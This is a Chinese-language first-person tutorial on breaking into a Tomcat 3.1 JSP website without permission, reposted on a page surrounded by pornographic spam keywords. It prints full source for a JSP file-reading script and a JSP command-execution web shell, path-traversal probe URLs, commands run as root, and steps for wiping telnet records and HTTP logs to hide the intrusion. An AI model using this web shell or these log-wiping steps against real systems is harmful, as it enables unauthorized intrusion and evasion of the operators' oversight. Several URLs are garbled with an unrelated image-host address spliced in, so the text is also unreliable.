六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網(wǎng)中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!

如何入侵基于JSP的網(wǎng)站

[摘要]很偶然的一個機會,瀏覽到一個網(wǎng)站,頁面清新讓人感覺很舒服。網(wǎng)站是用JSP開發(fā)的,出于個人愛好,我決定測試一下其系統(tǒng)的安全性。 telnet www.target.com 8080GET /CHINANSL HTTP/1.1[Enter][Enter]  返回的結果如下: HTTP/1.0 404 ...
很偶然的一個機會,瀏覽到一個網(wǎng)站,頁面清新讓人感覺很舒服。網(wǎng)站是用JSP開發(fā)的,出于個人愛好,我決定測試一下其系統(tǒng)的安全性。

telnet www.target.com 8080
GET /CHINANSL HTTP/1.1
[Enter]
[Enter]

  返回的結果如下:

HTTP/1.0 404 Not Found
Date: Sun, 08 Jul 2001 07:49:13 GMT
Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2
.2.12 i386; java.vendor=Blackdown Java-Linux Team)
Content-Language: en
Content-Type: text/html
Status: 404

〈h1〉Error: 404〈/h1〉
〈h2〉Location: /CHINANSL〈/h2〉File Not Found〈br〉/CHINANSL

  獲得了運行的WEBServer的名稱“Tomcat 3.1”。記得曾經(jīng)發(fā)現(xiàn)過這個版本的漏洞,并且post到bugtrap上去過。

  回憶一下,大概是通過“..”技術可以退出WEB目錄,于是:

http://target:8080/../../../../%00.jsp (不行)
http://target:8080/file/index.jsp (不行)
http://target:8080/index.JSP (不行)
http://target:8080/index.jsp%81 (不行)
http://target:8080/index.js%70 (不行)
http://target:8080/index.jsp%2581 (不行)
http://target:8080/WEB-INF/ (不行)

  看來安全狀況似乎還不錯,我們再來進行一下更深層的測試。Tomcat 3.1自帶了一個管理工具,可以查看WEB下的目錄及文件,并且可以添加context。于是嘗試:

http://target:8080/admin/

  管理員果然沒有刪除或禁止訪問這個目錄,從安全的角度說,這點應該算是一個比較重要的失誤。

  接著,點擊“VIEW ALL CONTEXT”按鈕,列出了WEB目錄下的一些文件和目錄的名稱,很快發(fā)現(xiàn)了一個上傳文件的組件,通過這個組件將一個JSP文件上傳到對方的WEB目錄里:

〈%@ page import="java.io.*" %〉
〈%
String file = request.getParameter("file");
String str = "";
FileInputStream fis = null;
DataInputStream dis = null;
try{
fis = new FileInputStream(file);
dis = new DataInputStream(fis);
while(true){
try{
str = dis.readLine();
}catch(Exception e){}
if(str == null)break;
out.print(str+"〈br〉");
}
}catch(IOException e){}
%〉

  然后執(zhí)行:

http://target:8080http://img6-2.22122511.com/upload/technique_8/test.jsp?file=/etc/passwd



   密碼出來了。接下來的過程是猜測密碼,沒有成功。不過,現(xiàn)在相當于有了一個SHELL,猜不出密碼可以先把IE當作SHELL環(huán)境。


[page_break]

  再寫一個JSP文件:

〈%@ page import="java.io.*" %〉
〈%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%〉

  然后把這個JSP再通過upload上傳,有SHELL了。

http://target:8080http://img6-2.22122511.com/upload/technique_8/cmd.jsp?cmd=ls+-la+/
(詳細結果這里就不列出來了)

  怎么獲得root權限呢?經(jīng)過一番搜索發(fā)現(xiàn)系統(tǒng)安裝了MySQL,并且從JSP的源代碼中得到了MySQL的密碼,執(zhí)行:

sqld"〉http://target:8080http://img6-2.22122511.com/upload/technique_8/cmd.jsp?cmd=ps+aux+ grep+mysqld

  顯示:

root 87494 0.2 1.9 17300 4800 p0- S 28Jun01 5:54.72 /usr/local/data/mysql

  系統(tǒng)是以root身份運行的MySQL。這時我思考了一下,既然知道了MySQL的密碼,那就可以寫一個SHELL程序,讓它創(chuàng)建一個表,然后將我的數(shù)據(jù)放到表中,再使用“select ... into outfile;”的辦法在系統(tǒng)上創(chuàng)建一個文件,讓用戶在執(zhí)行su的時候,運行我的程序。(還記得apache.org有一次被入侵嗎?黑客就采用的這種辦法)。

  之后就比較簡單了,上傳bindshell之類的程序,運行、獲得nobody的權限,使用su root時幫忙創(chuàng)建的setuid shell讓自己成為root。

  但是,接下來已經(jīng)實際操作,結果令人頗感意外:

http://target:8080http://img6-2.22122511.com/upload/technique_8/cmd.jsp?cmd=id

  顯示:

uid=0(root) gid=0(xxx) groups=0(xxx),2(xxx),3(xxx),4(xxx),5(xxx),20(xxx),31(xxx)

  原來這個WEB SHELL本來就是ROOT!管理員的安全設置工作到底怎么做的?

http://target:8080http://img6-2.22122511.com/upload/technique_8/cmd.jsp?cmd=ps+aux
果然是root身份運行的(不列出來了)

  剩下的事情:

  1、刪除我的telnet記錄。

  2、刪除http的日志。

  清除日志我使用的辦法是:cat xxx grep -V "IP" 〉〉temp然后在把temp覆蓋那些被我修改過的日志文件。




主站蜘蛛池模板: 日日操日日爽 | 四虎www免费人成 | 欧美最猛性xxxxx(亚洲精品) | 天干天干天啪啪夜爽爽色 | 伊人久久五月 | 偷偷干夜夜拍 | 亚洲第一页中文字幕 | 四虎国产一区二区三区 | 婷婷色爱区综合五月激情韩国 | 一区二区三区视频在线 | 一级做a爰片久久毛片毛片 一级做a爰片久久毛片看看 | 色偷偷91综合久久噜噜 | 香港三级理论在线观看网站 | 婷婷6月天| 日韩中文字幕一在线 | 一二三四在线观看日本 | 伊久久 | 日韩伦理视频在线观看 | 最近更新免费中文字幕大全 | 亚洲一区有码 | 亚洲欧美在线免费观看 | 亚洲成a人片在线观看中文动漫 | 在线亚洲一区 | 污污视频在线播放 | 日本欧美国产精品 | 亚洲国产日韩综合久久精品 | 色天天综合色天天碰 | 日韩欧美激情 | 桃花岛高清在线观看 | 青青草原免费在线视频 | 亚洲精品亚洲人成在线 | 小明精品国产一区二区三区 | 亚洲a级大片 | 亚洲一区二区三区精品影院 | 在线观看91香蕉国产免费 | 天天影视综合色 | 日本免费看片 | 欧美性生活网址 | 日本欧美一级二级三级不卡 | 天天综合射 | 四虎影院免费在线播放 |